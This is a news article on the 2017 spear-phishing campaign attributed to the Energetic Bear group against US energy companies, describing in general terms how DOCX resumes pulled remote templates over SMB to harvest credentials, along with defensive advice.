The Clever Phishing Trick Used by Hackers Targeting the US Energy Sector

Last week, the media was abuzz with apocalyptic headlines about how Russian hackers were launching cyber-attacks on the US energy and nuclear sector.

All the hoopla started when news broke about a joint alert sent by the Department of Homeland Security and the Federal Bureau of Investigation, which warned companies in the energy sector to be on the lookout for increased hacking activity.

Attacks pinned on Russia-linked group
According to the New York Times, the publication that first broke the story, a cyber-espionage group believed to be based in Russia was behind the attacks.

The report pinned the attacks on a group codenamed Energetic Bear, also referenced in other security reports as Dragonfly or Crouching Yeti. This group has been active since 2010 and has a history of targeting organizations in the energy sector since at least 2014.

One of the targets listed in the joint DHS and FBI alert was the Wolf Creek nuclear power plant in Burlington, Kansas. The NYT didn’t mention the nature of the cyber-attacks but said the alert received the second-highest security rating for the sensitivity of the threat.

“Cyber-attacks” were spear-phishing emails
Many feared these attacks were similar to the one that crippled Ukraine’s energy distribution network in the winter of 2015 and 2016. Those attacks were carried out using the BlackEnergy and Industroyer malware, respectively.

The severity of the “cyber-attacks” was clarified on late Friday night when Cisco’s Talos security division released more details about what happened.

According to Cisco, the attacks were basic spear-phishing attempts. Since May 2017, the Energetic Bear group had been sending a wave of emails to companies in the energy sector. The emails were disguised as people submitting CVs and resumes in the form of DOCX files.

DOCX file used sneaky trick to harvest local credentials
Cisco says that an initial analysis of these DOCX files almost fooled their researchers into thinking that nothing was wrong, as they didn’t include any macros or other exploits.

It was only by accident that they noticed an interesting status message in the loading screen of Microsoft Office.

The status message helped researchers realize that the DOCX file was secretly loading a Word template from a remote server. Further sleuthing revealed that the malicious DOCX file was trying to establish a connection to a remote SMB server.

By making a local host connect to a remote SMB server, the attackers were trying to trick a local computer into disclosing the credentials for the local network. This is an old trick, used in many attacks in the past.

Outcome of the attacks is unknown
Despite their findings, Cisco says that most of the infrastructure and servers involved in these attacks were down by the moment they started analyzing the threat, showing that attackers moved quickly to cover their tracks.

While the Cisco Talos research has helped clarify the severity of the cyber-attacks reported by the NYT last week, these aren’t to be taken lightly.

These attacks may have been basic reconnaissance operations, but their success is currently unknown, and all targeted organizations must make sure to change all their internal credentials.

In addition, because the campaign’s main C&C servers were down, it is unknown if attackers used the collected credentials to deliver additional malware to computers where the emails were viewed. Affected companies should also local computers for any malware the malicious document might have left behind.


. . . . . . . .

Leave a Reply